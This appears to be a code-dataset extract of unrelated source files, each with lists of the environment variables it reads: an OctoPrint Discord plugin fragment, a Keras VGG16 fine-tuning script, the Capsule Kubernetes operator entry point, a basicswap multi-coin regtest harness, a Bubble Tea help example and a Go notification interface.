self.periodic_thread.start()
def stop_periodic_reporting(self):
if self.periodic_signal is None or self.periodic_thread is None:
return
self.periodic_signal.set()
self.periodic_thread.join(timeout=60)
if self.periodic_thread.is_alive():
self._logger.error("Periodic thread has hung, leaking it now.")
else:
self._logger.info("Periodic thread joined.")
self.periodic_thread = None
self.periodic_signal = None
def periodic_reporting(self):
if not self._settings.get(["events", "printing_progress_periodic", "enabled"]):
return
timeout = self._settings.get(["events", "printing_progress_periodic", "period"])
while True:
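# Sleep in one-second slices so the stop signal and printer state are
# re-checked promptly instead of blocking for the whole reporting period.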
cur_time = time.time()
next_time = cur_time + int(timeout)
while time.time() < next_time:
time.sleep(1)
if self.periodic_signal.is_set():
return
if not self._printer.is_printing():
return
self.notify_event("printing_progress_periodic", data={"progress": self.last_progress_percent})
# If you want your plugin to be registered within OctoPrint under a different name than what you defined in setup.py
# ("OctoPrint-PluginSkeleton"), you may define that here. Same goes for the other metadata derived from setup.py that
# can be overwritten via __plugin_xyz__ control properties. See the documentation for that.
__plugin_name__ = "DiscordRemote"
__plugin_pythoncompat__ = ">=2.7,<4"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = DiscordRemotePlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information
}
| []
| []
| [
"FAKE_SNAPSHOT"
]
| [] | ["FAKE_SNAPSHOT"] | python | 1 | 0 | |
keras/training/train_vgg16x.py | from __future__ import print_function
import math, json, os, pickle, sys
import keras
from keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Conv2D, MaxPooling2D
from keras.models import Model, Sequential
from keras.optimizers import SGD
from keras.preprocessing.image import ImageDataGenerator
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
DATADIR = "/storage/plzen1/home/radekj/vmmr"
name = "vgg16x"
log_file = "{}_history_log.csv".format(name)
csv_logger = CSVLogger(log_file, append=True)
SIZE = (224, 224)
BATCH_SIZE = 64
EPOCH = 10
num_classes = 5
input_shape = (224, 224, 3)
def get_model():
model = keras.applications.vgg16.VGG16()
return model
def train_vgg(folder):
DATA_DIR = folder
TRAIN_DIR = os.path.join(DATA_DIR, 'train')
VALID_DIR = os.path.join(DATA_DIR, 'valid')
TEST_DIR = os.path.join(DATA_DIR, 'test')
save_aug = os.path.join(DATA_DIR, 'tmp')
num_train_samples = sum([len(files) for r, d, files in os.walk(TRAIN_DIR)])
num_valid_samples = sum([len(files) for r, d, files in os.walk(VALID_DIR)])
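# One step consumes one batch, so covering each split once per epoch needs
# roughly sample_count / BATCH_SIZE steps.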
num_train_steps = math.floor(num_train_samples / BATCH_SIZE)
num_valid_steps = math.floor(num_valid_samples / BATCH_SIZE)
train_gen = ImageDataGenerator()
batches = train_gen.flow_from_directory(
directory=TRAIN_DIR,
target_size=SIZE,
color_mode="rgb",
batch_size=BATCH_SIZE,
class_mode="categorical",
shuffle=True,
)
val_gen = ImageDataGenerator()
val_batches = val_gen.flow_from_directory(
directory=VALID_DIR,
target_size=SIZE,
color_mode="rgb",
batch_size=BATCH_SIZE,
class_mode="categorical",
shuffle=True,
)
model = get_model()
classes = list(iter(batches.class_indices))
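# Transfer-learning setup: drop the original 1000-class ImageNet head, freeze
# all layers of the pretrained VGG16 base, and attach a fresh softmax layer
# sized to the classes found in the training directory. Only the new layer
# receives weight updates below.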
model.layers.pop()
for layer in model.layers:
layer.trainable = False
last = model.layers[-1].output
x = Dense(len(classes), activation="softmax")(last)
finetuned_model = Model(model.input, x)
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
finetuned_model.compile(optimizer=sgd, loss='categorical_crossentropy',
metrics=['accuracy'])
for c in batches.class_indices:
classes[batches.class_indices[c]] = c
finetuned_model.classes = classes
early_stopping = EarlyStopping(patience=10)
check_pointer = ModelCheckpoint("{}_best.h5".format(name), verbose=1, save_best_only=True)
history = finetuned_model.fit_generator(batches, steps_per_epoch=num_train_steps, epochs=EPOCH,
callbacks=[csv_logger, early_stopping, check_pointer],
validation_data=val_batches, validation_steps=num_valid_steps)
model.save("{}_final.h5".format(name))
if __name__ == '__main__':
print(len(sys.argv))
if len(sys.argv) < 2:
print("Need param: python train_vgg16.py dataset_path")
exit(1)
folder = str(sys.argv[1])
exists = os.path.isdir(folder)
if not exists:
print("Folder '{}' not found.".format(folder))
exit(1)
exists = os.path.isfile(log_file)
if not exists:
f = open(log_file, "w+")
f.write("====== start ====")
f.close()
print("===== folder: {}".format(folder))
train_vgg(folder)
print("===== end.")
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
main.go | /*
Copyright 2020 Clastix Labs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"fmt"
"os"
"regexp"
goRuntime "runtime"
"go.uber.org/zap/zapcore"
"k8s.io/apimachinery/pkg/runtime"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
clientgoscheme "k8s.io/client-go/kubernetes/scheme"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/healthz"
"sigs.k8s.io/controller-runtime/pkg/log/zap"
capsulev1alpha1 "github.com/clastix/capsule/api/v1alpha1"
"github.com/clastix/capsule/controllers"
"github.com/clastix/capsule/controllers/rbac"
"github.com/clastix/capsule/controllers/secret"
"github.com/clastix/capsule/controllers/servicelabels"
"github.com/clastix/capsule/pkg/indexer"
"github.com/clastix/capsule/pkg/webhook"
"github.com/clastix/capsule/pkg/webhook/ingress"
"github.com/clastix/capsule/pkg/webhook/namespacequota"
"github.com/clastix/capsule/pkg/webhook/networkpolicies"
"github.com/clastix/capsule/pkg/webhook/ownerreference"
"github.com/clastix/capsule/pkg/webhook/pvc"
"github.com/clastix/capsule/pkg/webhook/registry"
"github.com/clastix/capsule/pkg/webhook/services"
"github.com/clastix/capsule/pkg/webhook/tenant"
"github.com/clastix/capsule/pkg/webhook/tenantprefix"
"github.com/clastix/capsule/pkg/webhook/utils"
// +kubebuilder:scaffold:imports
)
var (
scheme = runtime.NewScheme()
setupLog = ctrl.Log.WithName("setup")
)
func init() {
utilruntime.Must(clientgoscheme.AddToScheme(scheme))
utilruntime.Must(capsulev1alpha1.AddToScheme(scheme))
// +kubebuilder:scaffold:scheme
}
func printVersion() {
setupLog.Info(fmt.Sprintf("Capsule Version %s %s%s", GitTag, GitCommit, GitDirty))
setupLog.Info(fmt.Sprintf("Build from: %s", GitRepo))
setupLog.Info(fmt.Sprintf("Build date: %s", BuildTime))
setupLog.Info(fmt.Sprintf("Go Version: %s", goRuntime.Version()))
setupLog.Info(fmt.Sprintf("Go OS/Arch: %s/%s", goRuntime.GOOS, goRuntime.GOARCH))
}
func main() {
var metricsAddr string
var enableLeaderElection bool
var forceTenantPrefix bool
var v bool
var capsuleGroup string
var protectedNamespaceRegexpString string
var protectedNamespaceRegexp *regexp.Regexp
var allowTenantIngressHostnamesCollision bool
var allowIngressHostnamesCollision bool
var namespace string
flag.StringVar(&metricsAddr, "metrics-addr", ":8080", "The address the metric endpoint binds to.")
flag.StringVar(&capsuleGroup, "capsule-user-group", capsulev1alpha1.GroupVersion.Group, "Name of the group for capsule users")
flag.BoolVar(&enableLeaderElection, "enable-leader-election", false,
"Enable leader election for controller manager. "+
"Enabling this will ensure there is only one active controller manager.")
flag.BoolVar(&v, "version", false, "Print the Capsule version and exit")
flag.BoolVar(&forceTenantPrefix, "force-tenant-prefix", false, "Enforces the Tenant owner, "+
"during Namespace creation, to name it using the selected Tenant name as prefix, separated by a dash. "+
"This is useful to avoid Namespace name collision in a public CaaS environment.")
flag.StringVar(&protectedNamespaceRegexpString, "protected-namespace-regex", "", "Disallow creation of namespaces, whose name matches this regexp")
flag.BoolVar(
&allowTenantIngressHostnamesCollision,
"allow-tenant-ingress-hostnames-collision",
false,
"When defining the exact match for allowed Ingress hostnames at Tenant level, a collision is not allowed. "+
"Toggling this, Capsule will not check if a hostname collision is in place, allowing the creation of "+
"two or more Tenant resources although sharing the same allowed hostname(s).",
)
flag.BoolVar(&allowIngressHostnamesCollision, "allow-ingress-hostname-collision", true, "Allow the Ingress hostname collision at Ingress resource level across all the Tenants.")
opts := zap.Options{
EncoderConfigOptions: append([]zap.EncoderConfigOption{}, func(config *zapcore.EncoderConfig) {
config.EncodeTime = zapcore.ISO8601TimeEncoder
}),
}
opts.BindFlags(flag.CommandLine)
flag.Parse()
ctrl.SetLogger(zap.New(zap.UseFlagOptions(&opts)))
printVersion()
if v {
os.Exit(0)
}
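// Capsule needs to know the Namespace it runs in so the CA and TLS secret
// controllers can manage their secrets; the NAMESPACE variable is typically
// injected into the pod via the Kubernetes downward API.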
if namespace = os.Getenv("NAMESPACE"); len(namespace) == 0 {
setupLog.Error(fmt.Errorf("unable to determinate the Namespace Capsule is running on"), "unable to start manager")
os.Exit(1)
}
mgr, err := ctrl.NewManager(ctrl.GetConfigOrDie(), ctrl.Options{
Scheme: scheme,
MetricsBindAddress: metricsAddr,
Port: 9443,
LeaderElection: enableLeaderElection,
LeaderElectionID: "42c733ea.clastix.capsule.io",
HealthProbeBindAddress: ":10080",
})
if err != nil {
setupLog.Error(err, "unable to start manager")
os.Exit(1)
}
if len(protectedNamespaceRegexpString) > 0 {
protectedNamespaceRegexp, err = regexp.Compile(protectedNamespaceRegexpString)
if err != nil {
setupLog.Error(err, "unable to compile protected-namespace-regex", "protected-namespace-regex", protectedNamespaceRegexp)
os.Exit(1)
}
}
majorVer, minorVer, _, err := utils.GetK8sVersion()
if err != nil {
setupLog.Error(err, "unable to get kubernetes version")
os.Exit(1)
}
_ = mgr.AddReadyzCheck("ping", healthz.Ping)
_ = mgr.AddHealthzCheck("ping", healthz.Ping)
setupLog.Info("starting with following options:", "metricsAddr", metricsAddr, "enableLeaderElection", enableLeaderElection, "forceTenantPrefix", forceTenantPrefix)
if err = (&controllers.TenantReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("Tenant"),
Scheme: mgr.GetScheme(),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Tenant")
os.Exit(1)
}
// +kubebuilder:scaffold:builder
// webhooks: the order matters, don't change it and just append
wl := append(
make([]webhook.Webhook, 0),
ingress.Webhook(ingress.Handler(allowIngressHostnamesCollision)),
pvc.Webhook(pvc.Handler()),
registry.Webhook(registry.Handler()),
services.Webhook(services.Handler()),
ownerreference.Webhook(utils.InCapsuleGroup(capsuleGroup, ownerreference.Handler(forceTenantPrefix))),
namespacequota.Webhook(utils.InCapsuleGroup(capsuleGroup, namespacequota.Handler())),
networkpolicies.Webhook(utils.InCapsuleGroup(capsuleGroup, networkpolicies.Handler())),
tenantprefix.Webhook(utils.InCapsuleGroup(capsuleGroup, tenantprefix.Handler(forceTenantPrefix, protectedNamespaceRegexp))),
tenant.Webhook(tenant.Handler(allowTenantIngressHostnamesCollision)),
)
if err = webhook.Register(mgr, wl...); err != nil {
setupLog.Error(err, "unable to setup webhooks")
os.Exit(1)
}
rbacManager := &rbac.Manager{
Log: ctrl.Log.WithName("controllers").WithName("Rbac"),
CapsuleGroup: capsuleGroup,
}
if err = mgr.Add(rbacManager); err != nil {
setupLog.Error(err, "unable to create cluster roles")
os.Exit(1)
}
if err = rbacManager.SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Rbac")
os.Exit(1)
}
if err = (&secret.CAReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("CA"),
Scheme: mgr.GetScheme(),
Namespace: namespace,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Namespace")
os.Exit(1)
}
if err = (&secret.TLSReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("Tls"),
Scheme: mgr.GetScheme(),
Namespace: namespace,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Namespace")
os.Exit(1)
}
if err = (&servicelabels.ServicesLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("ServiceLabels"),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "ServiceLabels")
os.Exit(1)
}
if err = (&servicelabels.EndpointsLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("EndpointLabels"),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "EndpointLabels")
os.Exit(1)
}
if err = (&servicelabels.EndpointSlicesLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("EndpointSliceLabels"),
VersionMinor: minorVer,
VersionMajor: majorVer,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "EndpointSliceLabels")
}
if err = indexer.AddToManager(mgr); err != nil {
setupLog.Error(err, "unable to setup indexers")
os.Exit(1)
}
setupLog.Info("starting manager")
if err = mgr.Start(ctrl.SetupSignalHandler()); err != nil {
setupLog.Error(err, "problem running manager")
os.Exit(1)
}
}
| [
"\"NAMESPACE\""
]
| []
| [
"NAMESPACE"
]
| [] | ["NAMESPACE"] | go | 1 | 0 | |
tests/basicswap/extended/test_xmr_persistent.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""
export RESET_TEST=true
export TEST_PATH=/tmp/test_persistent
mkdir -p ${TEST_PATH}/bin/{particl,monero,bitcoin}
cp ~/tmp/particl-0.21.2.3-x86_64-linux-gnu.tar.gz ${TEST_PATH}/bin/particl
cp ~/tmp/bitcoin-0.21.1-x86_64-linux-gnu.tar.gz ${TEST_PATH}/bin/bitcoin
cp ~/tmp/monero-linux-x64-v0.17.2.3.tar.bz2 ${TEST_PATH}/bin/monero/monero-0.17.2.3-x86_64-linux-gnu.tar.bz2
export PYTHONPATH=$(pwd)
python tests/basicswap/extended/test_xmr_persistent.py
"""
import os
import sys
import json
import time
import random
import shutil
import signal
import logging
import unittest
import threading
import multiprocessing
from urllib.request import urlopen
from unittest.mock import patch
from basicswap.rpc_xmr import (
callrpc_xmr_na,
)
from basicswap.rpc import (
callrpc,
)
from tests.basicswap.mnemonics import mnemonics as test_mnemonics
from tests.basicswap.common import (
waitForServer,
)
from basicswap.contrib.rpcauth import generate_salt, password_to_hmac
import basicswap.config as cfg
import bin.basicswap_prepare as prepareSystem
import bin.basicswap_run as runSystem
def make_boolean(s):
return s.lower() in ['1', 'true']
test_path = os.path.expanduser(os.getenv('TEST_PATH', '/tmp/test_persistent'))
PARTICL_PORT_BASE = int(os.getenv('PARTICL_PORT_BASE', '11938'))
BITCOIN_PORT_BASE = int(os.getenv('BITCOIN_PORT_BASE', '10938'))
RESET_TEST = make_boolean(os.getenv('RESET_TEST', 'false'))
XMR_BASE_P2P_PORT = 17792
XMR_BASE_RPC_PORT = 29798
XMR_BASE_WALLET_RPC_PORT = 29998
PORT_OFS = 1
UI_PORT = 12700 + PORT_OFS
BASE_PART_RPC_PORT = 19792
BASE_BTC_RPC_PORT = 19796
NUM_NODES = int(os.getenv('NUM_NODES', 3))
EXTRA_CONFIG_JSON = json.loads(os.getenv('EXTRA_CONFIG_JSON', '{}'))
logger = logging.getLogger()
logger.level = logging.DEBUG
if not len(logger.handlers):
logger.addHandler(logging.StreamHandler(sys.stdout))
def recursive_update_dict(base, new_vals):
for key, value in new_vals.items():
if key in base and isinstance(value, dict):
recursive_update_dict(base[key], value)
else:
base[key] = value
def callpartrpc(node_id, method, params=[], wallet=None, base_rpc_port=BASE_PART_RPC_PORT + PORT_OFS):
auth = 'test_part_{0}:test_part_pwd_{0}'.format(node_id)
return callrpc(base_rpc_port + node_id, auth, method, params, wallet)
def callbtcrpc(node_id, method, params=[], wallet=None, base_rpc_port=BASE_BTC_RPC_PORT + PORT_OFS):
auth = 'test_btc_{0}:test_btc_pwd_{0}'.format(node_id)
return callrpc(base_rpc_port + node_id, auth, method, params, wallet)
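# The update threads below keep the regtest chains moving: they mine a BTC/XMR
# block at randomised intervals so that swap transactions confirm while the
# test is running.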
def updateThread(cls):
while not cls.delay_event.is_set():
try:
if cls.btc_addr is not None:
callbtcrpc(0, 'generatetoaddress', [1, cls.btc_addr])
except Exception as e:
print('updateThread error', str(e))
cls.delay_event.wait(random.randrange(cls.update_min, cls.update_max))
def updateThreadXmr(cls):
while not cls.delay_event.is_set():
try:
if cls.xmr_addr is not None:
callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'generateblocks', {'wallet_address': cls.xmr_addr, 'amount_of_blocks': 1})
except Exception as e:
print('updateThreadXmr error', str(e))
cls.delay_event.wait(random.randrange(cls.xmr_update_min, cls.xmr_update_max))
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(Test, cls).setUpClass()
cls.update_min = int(os.getenv('UPDATE_THREAD_MIN_WAIT', '1'))
cls.update_max = cls.update_min * 4
cls.xmr_update_min = int(os.getenv('XMR_UPDATE_THREAD_MIN_WAIT', '1'))
cls.xmr_update_max = cls.xmr_update_min * 4
cls.delay_event = threading.Event()
cls.update_thread = None
cls.update_thread_xmr = None
cls.processes = []
cls.btc_addr = None
cls.xmr_addr = None
random.seed(time.time())
logging.info('Preparing %d nodes.', NUM_NODES)
for i in range(NUM_NODES):
logging.info('Preparing node: %d.', i)
client_path = os.path.join(test_path, 'client{}'.format(i))
config_path = os.path.join(client_path, cfg.CONFIG_FILENAME)
if RESET_TEST:
try:
logging.info('Removing dir %s', client_path)
shutil.rmtree(client_path)
except Exception as ex:
logging.warning('setUpClass %s', str(ex))
if not os.path.exists(config_path):
os.environ['PART_RPC_PORT'] = str(BASE_PART_RPC_PORT)
os.environ['BTC_RPC_PORT'] = str(BASE_BTC_RPC_PORT)
testargs = [
'basicswap-prepare',
'-datadir="{}"'.format(client_path),
'-bindir="{}"'.format(os.path.join(test_path, 'bin')),
'-portoffset={}'.format(i + PORT_OFS),
'-regtest',
'-withcoins=monero,bitcoin',
'-noextractover',
'-xmrrestoreheight=0']
if i < len(test_mnemonics):
testargs.append('-particl_mnemonic="{}"'.format(test_mnemonics[i]))
with patch.object(sys, 'argv', testargs):
prepareSystem.main()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'w') as fp:
for line in lines:
if not line.startswith('staking'):
fp.write(line)
fp.write('port={}\n'.format(PARTICL_PORT_BASE + i + PORT_OFS))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
fp.write('minstakeinterval=5\n')
fp.write('smsgsregtestadjust=0\n')
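# Each node gets its own rpcauth credential line (user:salt$hmac) so the test
# can use a fixed username/password for RPC instead of cookie files.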
salt = generate_salt(16)
fp.write('rpcauth={}:{}${}\n'.format('test_part_' + str(i), salt, password_to_hmac(salt, 'test_part_pwd_' + str(i))))
for ip in range(NUM_NODES):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(PARTICL_PORT_BASE + ip + PORT_OFS))
# Pruned nodes don't provide blocks
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'w') as fp:
for line in lines:
if not line.startswith('prune'):
fp.write(line)
fp.write('port={}\n'.format(BITCOIN_PORT_BASE + i + PORT_OFS))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
salt = generate_salt(16)
fp.write('rpcauth={}:{}${}\n'.format('test_btc_' + str(i), salt, password_to_hmac(salt, 'test_btc_pwd_' + str(i))))
for ip in range(NUM_NODES):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(BITCOIN_PORT_BASE + ip + PORT_OFS))
for opt in EXTRA_CONFIG_JSON.get('btc{}'.format(i), []):
fp.write(opt + '\n')
with open(os.path.join(client_path, 'monero', 'monerod.conf'), 'a') as fp:
fp.write('p2p-bind-ip=127.0.0.1\n')
fp.write('p2p-bind-port={}\n'.format(XMR_BASE_P2P_PORT + i + PORT_OFS))
for ip in range(NUM_NODES):
if ip != i:
fp.write('add-exclusive-node=127.0.0.1:{}\n'.format(XMR_BASE_P2P_PORT + ip + PORT_OFS))
with open(config_path) as fs:
settings = json.load(fs)
settings['min_delay_event'] = 1
settings['max_delay_event'] = 4
settings['min_delay_retry'] = 15
settings['max_delay_retry'] = 30
settings['min_sequence_lock_seconds'] = 60
settings['check_progress_seconds'] = 5
settings['check_watched_seconds'] = 5
settings['check_expired_seconds'] = 60
settings['check_events_seconds'] = 5
settings['check_xmr_swaps_seconds'] = 5
settings['chainclients']['particl']['rpcuser'] = 'test_part_' + str(i)
settings['chainclients']['particl']['rpcpassword'] = 'test_part_pwd_' + str(i)
settings['chainclients']['bitcoin']['rpcuser'] = 'test_btc_' + str(i)
settings['chainclients']['bitcoin']['rpcpassword'] = 'test_btc_pwd_' + str(i)
extra_config = EXTRA_CONFIG_JSON.get('sc{}'.format(i), {})
recursive_update_dict(settings, extra_config)
with open(config_path, 'w') as fp:
json.dump(settings, fp, indent=4)
signal.signal(signal.SIGINT, lambda signal, frame: cls.signal_handler(cls, signal, frame))
def signal_handler(self, sig, frame):
logging.info('signal {} detected.'.format(sig))
self.delay_event.set()
def run_thread(self, client_id):
client_path = os.path.join(test_path, 'client{}'.format(client_id))
testargs = ['basicswap-run', '-datadir=' + client_path, '-regtest']
with patch.object(sys, 'argv', testargs):
runSystem.main()
def start_processes(self):
self.delay_event.clear()
for i in range(NUM_NODES):
self.processes.append(multiprocessing.Process(target=self.run_thread, args=(i,)))
self.processes[-1].start()
for i in range(NUM_NODES):
waitForServer(self.delay_event, UI_PORT + i)
wallets = json.loads(urlopen('http://127.0.0.1:{}/json/wallets'.format(UI_PORT + 1)).read())
self.xmr_addr = wallets['6']['deposit_address']
num_blocks = 100
if callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'get_block_count')['count'] < num_blocks:
logging.info('Mining {} Monero blocks to {}.'.format(num_blocks, self.xmr_addr))
callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'generateblocks', {'wallet_address': self.xmr_addr, 'amount_of_blocks': num_blocks})
logging.info('XMR blocks: %d', callrpc_xmr_na(XMR_BASE_RPC_PORT + 1, 'get_block_count')['count'])
self.btc_addr = callbtcrpc(0, 'getnewaddress', ['mining_addr', 'bech32'])
num_blocks = 500 # Mine enough to activate segwit
if callbtcrpc(0, 'getblockchaininfo')['blocks'] < num_blocks:
logging.info('Mining %d Bitcoin blocks to %s', num_blocks, self.btc_addr)
callbtcrpc(0, 'generatetoaddress', [num_blocks, self.btc_addr])
logging.info('BTC blocks: %d', callbtcrpc(0, 'getblockchaininfo')['blocks'])
# Lower output split threshold for more stakeable outputs
for i in range(NUM_NODES):
callpartrpc(i, 'walletsettings', ['stakingoptions', {'stakecombinethreshold': 100, 'stakesplitthreshold': 200}])
self.update_thread = threading.Thread(target=updateThread, args=(self,))
self.update_thread.start()
self.update_thread_xmr = threading.Thread(target=updateThreadXmr, args=(self,))
self.update_thread_xmr.start()
# Wait for height, or sequencelock is thrown off by genesis blocktime
num_blocks = 3
logging.info('Waiting for Particl chain height %d', num_blocks)
for i in range(60):
if self.delay_event.is_set():
raise ValueError('Test stopped.')
particl_blocks = callpartrpc(0, 'getblockchaininfo')['blocks']
print('particl_blocks', particl_blocks)
if particl_blocks >= num_blocks:
break
self.delay_event.wait(1)
logging.info('PART blocks: %d', callpartrpc(0, 'getblockchaininfo')['blocks'])
assert(particl_blocks >= num_blocks)
@classmethod
def tearDownClass(cls):
logging.info('Stopping test')
cls.delay_event.set()
if cls.update_thread:
cls.update_thread.join()
if cls.update_thread_xmr:
cls.update_thread_xmr.join()
for p in cls.processes:
p.terminate()
for p in cls.processes:
p.join()
cls.update_thread = None
cls.update_thread_xmr = None
cls.processes = []
def test_persistent(self):
self.start_processes()
waitForServer(self.delay_event, UI_PORT + 0)
waitForServer(self.delay_event, UI_PORT + 1)
while not self.delay_event.is_set():
logging.info('Looping indefinitely, ctrl+c to exit.')
self.delay_event.wait(10)
if __name__ == '__main__':
unittest.main()
| []
| []
| [
"BITCOIN_PORT_BASE",
"PART_RPC_PORT",
"XMR_UPDATE_THREAD_MIN_WAIT",
"BTC_RPC_PORT",
"TEST_PATH",
"NUM_NODES",
"EXTRA_CONFIG_JSON",
"RESET_TEST",
"PARTICL_PORT_BASE",
"UPDATE_THREAD_MIN_WAIT"
]
| [] | ["BITCOIN_PORT_BASE", "PART_RPC_PORT", "XMR_UPDATE_THREAD_MIN_WAIT", "BTC_RPC_PORT", "TEST_PATH", "NUM_NODES", "EXTRA_CONFIG_JSON", "RESET_TEST", "PARTICL_PORT_BASE", "UPDATE_THREAD_MIN_WAIT"] | python | 10 | 0 | |
examples/help/main.go | package main
import (
"fmt"
"os"
"strings"
"github.com/charmbracelet/bubbles/help"
"github.com/charmbracelet/bubbles/key"
tea "github.com/charmbracelet/bubbletea"
"github.com/charmbracelet/lipgloss"
)
// keyMap defines a set of keybindings. To work for help it must satisfy
// key.Map. It could also very easily be a map[string]key.Binding.
type keyMap struct {
Up key.Binding
Down key.Binding
Left key.Binding
Right key.Binding
Help key.Binding
Quit key.Binding
}
// ShortHelp returns keybindings to be shown in the mini help view. It's part
// of the key.Map interface.
func (k keyMap) ShortHelp() []key.Binding {
return []key.Binding{k.Help, k.Quit}
}
// FullHelp returns keybindings for the expanded help view. It's part of the
// key.Map interface.
func (k keyMap) FullHelp() [][]key.Binding {
return [][]key.Binding{
{k.Up, k.Down, k.Left, k.Right}, // first column
{k.Help, k.Quit}, // second column
}
}
var keys = keyMap{
Up: key.NewBinding(
key.WithKeys("up", "k"),
key.WithHelp("↑/k", "move up"),
),
Down: key.NewBinding(
key.WithKeys("down", "j"),
key.WithHelp("↓/j", "move down"),
),
Left: key.NewBinding(
key.WithKeys("left", "h"),
key.WithHelp("←/h", "move left"),
),
Right: key.NewBinding(
key.WithKeys("right", "l"),
key.WithHelp("→/l", "move right"),
),
Help: key.NewBinding(
key.WithKeys("?"),
key.WithHelp("?", "toggle help"),
),
Quit: key.NewBinding(
key.WithKeys("q", "esc", "ctrl+c"),
key.WithHelp("q", "quit"),
),
}
type model struct {
keys keyMap
help help.Model
inputStyle lipgloss.Style
lastKey string
quitting bool
}
func newModel() model {
return model{
keys: keys,
help: help.NewModel(),
inputStyle: lipgloss.NewStyle().Foreground(lipgloss.Color("#FF75B7")),
}
}
func (m model) Init() tea.Cmd {
return nil
}
func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg := msg.(type) {
case tea.WindowSizeMsg:
// If we set a width on the help menu it can gracefully truncate
// its view as needed.
m.help.Width = msg.Width
case tea.KeyMsg:
switch {
case key.Matches(msg, m.keys.Up):
m.lastKey = "↑"
case key.Matches(msg, m.keys.Down):
m.lastKey = "↓"
case key.Matches(msg, m.keys.Left):
m.lastKey = "←"
case key.Matches(msg, m.keys.Right):
m.lastKey = "→"
case key.Matches(msg, m.keys.Help):
m.help.ShowAll = !m.help.ShowAll
case key.Matches(msg, m.keys.Quit):
m.quitting = true
return m, tea.Quit
}
}
return m, nil
}
func (m model) View() string {
if m.quitting {
return "Bye!\n"
}
var status string
if m.lastKey == "" {
status = "Waiting for input..."
} else {
status = "You chose: " + m.inputStyle.Render(m.lastKey)
}
helpView := m.help.View(m.keys)
height := 8 - strings.Count(status, "\n") - strings.Count(helpView, "\n")
return "\n" + status + strings.Repeat("\n", height) + helpView
}
func main() {
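// Bubble Tea owns the terminal while the program runs, so ordinary prints are
// not visible; setting HELP_DEBUG to any non-empty value redirects log output
// to debug.log instead.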
if os.Getenv("HELP_DEBUG") != "" {
if f, err := tea.LogToFile("debug.log", "help"); err != nil {
fmt.Println("Couldn't open a file for logging:", err)
os.Exit(1)
} else {
defer f.Close()
}
}
if err := tea.NewProgram(newModel()).Start(); err != nil {
fmt.Printf("Could not start program :(\n%v\n", err)
os.Exit(1)
}
}
| [
"\"HELP_DEBUG\""
]
| []
| [
"HELP_DEBUG"
]
| [] | ["HELP_DEBUG"] | go | 1 | 0 | |
notification_manager.go | package servermanager
import (
"fmt"
"net/url"
"os"
"strconv"
"strings"
"time"
"github.com/hako/durafmt"
"github.com/sirupsen/logrus"
)
type NotificationDispatcher interface {
HasNotificationReminders() bool
GetNotificationReminders() []int
SendMessage(title string, msg string) error
SendMessageWithLink(title string, msg string, linkText string, link *url.URL) error
SendRaceStartMessage(config ServerConfig, event RaceEvent) error
SendRaceScheduledMessage(event *CustomRace, date time.Time) error
SendRaceCancelledMessage(event *CustomRace, date time.Time) error
SendRaceReminderMessage(event *CustomRace, timer int) error
SendChampionshipReminderMessage(championship *Championship, event *ChampionshipEvent, timer int) error
SendRaceWeekendReminderMessage(raceWeekend *RaceWeekend, session *RaceWeekendSession, timer int) error
SaveServerOptions(oldServerOpts *GlobalServerConfig, newServerOpts *GlobalServerConfig) error
}
